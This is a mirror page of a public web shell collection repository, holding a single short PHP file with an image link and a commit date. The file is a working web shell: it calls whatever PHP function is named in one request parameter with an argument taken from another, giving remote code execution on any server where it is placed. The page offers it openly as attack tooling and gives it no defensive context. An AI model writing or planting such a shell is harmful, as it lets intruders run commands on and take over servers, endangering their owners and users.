mirror of
https://github.com/tennc/webshell
synced 2025-02-16 17:58:23 +00:00
281 B
281 B
![Title alt text](/Mirrors/webshell/media/commit/d64b110665ac9d8842fac84e290b2d3cee02d0fd/php/p2j/11.jpg)
code:
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>